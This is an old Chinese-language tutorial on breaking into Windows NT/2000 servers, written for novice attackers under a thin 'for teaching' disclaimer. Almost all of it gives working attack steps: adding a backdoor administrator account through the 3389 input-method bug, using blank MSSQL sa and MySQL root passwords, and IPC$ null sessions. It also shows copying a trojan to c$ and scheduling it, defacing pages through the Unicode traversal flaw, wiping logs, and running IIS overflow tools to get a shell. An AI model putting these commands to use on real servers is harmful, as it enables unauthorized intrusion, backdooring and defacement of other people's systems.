WinNT2k服务器一般攻击攻击过程
本文用于教学!如果非法对他人服务器攻击,一切后果于本人没有关系!
现在WinNT/2k服务器漏洞很多，可以利用的也不少，所以一些新入手的小hacker
就看中了Win这个系统，下面说说，我以前的一些经验心得！高手免看！
首先工具：最好你要有个Nt/2k系统，哪个版本都可以
Super Scanner 一个端口扫描程序，速度很快！
X-scanner 1.3 一个漏洞扫描程序包括了端口扫描，rpc扫描，CGI扫描
简单的密码测试。并且开放了插件接口代码，和可以自己来加一些漏洞资料。
并且支持Tcp/syn不同的扫描方式。
流光,呵呵，还是自己看看吧，很久都没用到哪个东西了。
sunx的 iis5hack.exe (.printf溢出）idahack.exe (.ida溢出)
snake的 idq溢出
netcat.exe 也就是 nc.exe 大家都知道了吧！
一个3389客户端，可以单独分离出来。
Fontpage2000，有的时候这个也可以做为工具使用
其他的，ndde.exe，和一些shellcode,这些，我们做为下篇介绍。
sqlexec.exe 有的时候这个东西也很有用!
---------------------------------------------------------------------
1，扫描！
端口扫描，一般来说，对我们有用的端口 21,23,25,80,138/139.3389,79,1433,3306.....
也有的是木马开的端口和其他的服务，并且端口也可以更改！
以前有个3389，也就是输入法漏洞，呵呵，做肉鸡挺不错的，但现在很少了~~55
Super scanner 对台湾的地址进行扫描中，端口选择3389
然后用3389客户端进行连接后，点id的时候，把输入法点出来，然后点帮助里，
->输入法入门，后点鼠标左键，看到一个小的windows了吗。
然后我们选择
c:winntsystem32 找到net.exe这个文件没有，找到后，然后创建
一个快捷方式，修改属性net.exe user hacker q1w2e3 /add 后运行，当然，没什么
反映，然后同样的方法net.exe localgroup administrators hacker /add，运行后，然后你就可以
登陆这个系统了。然后都是同一过程，放后门，kill log
或可以用上次我看到黑白发表的一篇文章,写到，到哪个小窗口的时候,我们可以写上一个ncx.exe或其他木马后门之类的软件,但不要是压缩过的,然后我们运行后....直接可以telnet ip port!
23,25端口 telnet 23 or 25 我记得以前版本的sendmail
有个bug可以把passwd发到你指定的mail里，现在呢？很少了。。。
也可以来试着猜用户名和密码。。。。呵呵，但这样的人不是很多哦。 其实，可以用来做匿名邮件服务器使用.具体方法在下部介绍
79端口，我们可以了解一些用户的信息。
finger 0
得到用户信息后，可以用一些ftp破解或简单用户密码猜测或letmain(好象是这个软件吧)
80 呵呵，其实不光是做http服务来使用，可以作为端口重定向来使用，可以饶开防火墙（但不完全）呵呵，但稳定性不是很好的bingcheng 的站点 上有这个软件！
其实我们用的最多的就是80口上进行cgi/iis漏洞进行扫描！
1433,mssql服务,有个sa的用户,密码为"＂
然后可以利用　sql连接工具连接
　net user hack 234 /add
..................
然后net start看一下开了什么服务！
当然你也可以开启他的telnet ,3389或可以停止什么服务
具体请看net help
3306 mysql，有个root用户．密码空．
需要mysql客户端连接入．然后可以自己来编写些很小的语句就可以
做到你想做的事情．
常见的可以很好的利用的一些：
Unicode/2次解码漏洞
idq/ida
Phf漏洞
.printf
FrontPage扩展漏洞 ………
具体请看cgi/iis漏洞资料表
139 NETBIOS信息泄露,有可能可以使用ipc$空连接,或可以使用流光等工具进行简单用户密码猜测等.
C:>net use \ ipc$ “” /user:”” 建立空连接
C:>net view \ 查看文件的共享
C:>net use \ 建立一个连接通道
C:>dir \ 显示远程服务器文件
C:>net time \ 取得远程服务器时间
C:>copy svr.exe \ 复制木马到远程服务器的c$中
C:> at time \ 指定时间运行
下面说说一些常见的漏洞进行攻击!
Unicode/2次解码漏洞:
这个东西很古老了,但是前段时间的redcode/bulecode就是用的这个漏洞进行传播!
一般的就是用ie来作为攻击软件,把cmd.exe换名后,可以 使用ftp调用脚本的方法
或tftp来把木马或其他东西放到对方服务器中运行.sunx有个dll文件可以很容易的作到而且可以利用这个东西得到admin或对付一些ids.()有详细资料.
或可以使用echo命令来写一些东西,最经典的就是root.exe?/c+echo hacker by F-king>c:inetpubwwwrootindex.html
. fontpage 扩展漏洞,可以使用fontpage作为工具登陆到服务器修改站点文件!
.printf是一个iis中映射问题,只要不使用远程打印服务的话。就可以删除
用iis5hack就可以得到一个shell,但时间不是很长,建立一个用户的时间道够了
.idq snake有个溢出程序,gui版本的好用一点,但老是dos!
.ida sunx 有个溢出程序.效果还不错!10次成功一次就不错了。呵呵
:idahack 80 指定sp 1 然后是shellport 我一般喜欢99-)
然后nc –vv 99 或telnet 99
idq基本使用一样.
---------------
入门2技巧:
看到一个站点后,telnet ip 80一下,然后看看返回值就知道什么服务器了.
比如,我不想开扫描软件,想知道有什么服务

.ida
.htr
.htw
msadcs.dll 有个mdac.pl的脚本可以导致攻击者远程执行你系统的命令
......然后出现了什么，如果有这样的情况出现,我想哪个服务器
因该不是很安全的吧!